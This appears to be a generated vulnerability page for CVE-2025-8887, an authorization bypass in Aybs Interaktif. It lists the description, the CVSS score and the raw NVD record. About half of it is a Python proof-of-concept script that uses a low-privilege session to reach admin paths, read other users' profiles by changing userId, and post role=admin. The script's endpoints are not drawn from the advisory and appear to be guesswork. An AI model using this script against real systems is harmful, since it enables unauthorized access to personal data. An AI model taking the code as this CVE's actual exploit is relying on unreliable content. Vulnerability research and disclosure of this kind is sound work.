Security Vulnerability Report

CVE-2025-8887

Published: 2025-10-10 14:15:44
Last Modified: 2026-04-15 00:35:42

Description

Authorization Bypass Through User-Controlled Key, Missing Authorization, Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Usta Information Systems Inc. Aybs Interaktif allows Forceful Browsing, Parameter Injection, Input Data Manipulation. This issue affects Aybs Interaktif: from 2024 through 28082025.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Aybs Interaktif 2024
All versions of Aybs Interaktif from 2024 through 28082025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8887 PoC - Aybs Interaktif Authorization Bypass
# Vulnerability: Authorization Bypass Through User-Controlled Key
# Affected: Aybs Interaktif 2024 - 28082025
import requests

# Target configuration
TARGET_URL = "https://target-aybs-app.com"
SESSION_COOKIE = "session=YOUR_SESSION_COOKIE"  # Low-privilege authenticated session


# Step 1: Forceful Browsing - Access admin/restricted endpoints directly
def forceful_browsing():
    """Attempt to access restricted endpoints via direct URL navigation"""
    restricted_paths = [
        "/admin/dashboard",
        "/admin/users",
        "/api/v1/admin/config",
        "/management/reports",
    ]
    headers = {"Cookie": SESSION_COOKIE}
    for path in restricted_paths:
        resp = requests.get(f"{TARGET_URL}{path}", headers=headers, verify=False)
        if resp.status_code == 200:
            print(f"[+] Accessible without proper authorization: {path}")
            print(f"    Response snippet: {resp.text[:200]}")


# Step 2: Parameter Injection - Modify user-controlled keys to access other users' data
def parameter_injection():
    """Modify userId parameter to access other users' sensitive information"""
    headers = {"Cookie": SESSION_COOKIE}
    # Original request (legitimate): GET /api/user/profile?userId=self
    # Modified request (exploit):    GET /api/user/profile?userId=victim_id
    victim_user_id = "100"  # Target user ID
    resp = requests.get(
        f"{TARGET_URL}/api/user/profile?userId={victim_user_id}",
        headers=headers,
        verify=False,
    )
    if resp.status_code == 200 and "victim_data_indicator" in resp.text:
        print(f"[+] Successfully accessed victim user {victim_user_id} data")
        print(f"    Response: {resp.text}")


# Step 3: Input Data Manipulation - Alter input to bypass authorization checks
def input_data_manipulation():
    """Manipulate form/API input to bypass authorization"""
    headers = {"Cookie": SESSION_COOKIE, "Content-Type": "application/json"}
    payload = {
        "role": "admin",       # Privilege escalation via parameter
        "userId": "1",         # Target admin user
        "action": "view_all",  # Force action beyond permission
    }
    resp = requests.post(
        f"{TARGET_URL}/api/records/access",
        json=payload,
        headers=headers,
        verify=False,
    )
    if resp.status_code == 200:
        print("[+] Authorization bypassed via input manipulation")
        print(f"    Response: {resp.text}")


if __name__ == "__main__":
    print("[*] CVE-2025-8887 PoC - Aybs Interaktif Authorization Bypass")
    print("[*] Testing Forceful Browsing...")
    forceful_browsing()
    print("\n[*] Testing Parameter Injection...")
    parameter_injection()
    print("\n[*] Testing Input Data Manipulation...")
    input_data_manipulation()

References

https://www.usom.gov.tr/bildirim/tr-25-0329
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-8887",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-10T14:15:44.043",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authorization Bypass Through User-Controlled Key, Missing Authorization, Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Usta Information Systems Inc. Aybs Interaktif allows Forceful Browsing, Parameter Injection, Input Data Manipulation.This issue affects Aybs Interaktif: from 2024 through 28082025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"},
          {"lang": "en", "value": "CWE-639"},
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0329",
        "source": "[email protected]"
      }
    ]
  }
}